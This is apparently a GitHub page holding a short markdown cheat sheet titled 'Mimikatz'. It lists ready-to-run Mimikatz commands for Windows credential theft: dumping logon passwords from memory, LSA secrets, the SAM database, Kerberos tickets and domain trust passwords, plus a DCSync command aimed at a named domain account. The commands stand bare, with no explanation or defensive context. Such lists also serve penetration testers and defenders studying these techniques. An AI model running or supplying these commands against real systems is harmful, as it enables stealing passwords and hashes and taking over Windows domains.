Skip to content

Latest commit

 

History

History
29 lines (24 loc) · 327 Bytes

mimikatz.md

File metadata and controls

29 lines (24 loc) · 327 Bytes

Mimikatz

privilege::debug
sekurlsa::logonpasswords
lsadump::lsa /patch
lsadump::sam
kerberos::list /export

Dumping trust passwords:

mimikatz.exe “privilege::debug” “lsadump::trust /patch” exit

DC Sync

lsadump::dcsync /user:xyz\D2cy